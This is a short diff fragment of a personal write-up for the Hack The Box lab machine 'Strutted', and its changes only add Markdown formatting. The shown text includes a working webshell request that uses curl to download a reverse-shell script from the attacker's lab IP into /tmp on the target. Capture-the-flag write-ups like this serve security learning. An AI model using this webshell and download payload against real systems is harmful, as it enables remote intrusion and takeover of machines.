TheRedP4nther/theredp4nther.github.io/_writeups/2024/HTB/Strutted.md

 Perfect!!
 We can `execute` commands in the system, let's gain `access` with a `Reverse Shell`.

-To do it, firt we create a "reverse.sh" file and put it in the /tmp path of the victim system with curl:
+To do it, firt we create a `"reverse.sh"` file and put it in the `/tmp` path of the victim system with `curl`:

 -> `http://strutted.htb/webshell.jsp?action=cmd&cmd=curl%2010.10.14.22/reverse.sh%20-o%20/tmp/reverse.sh`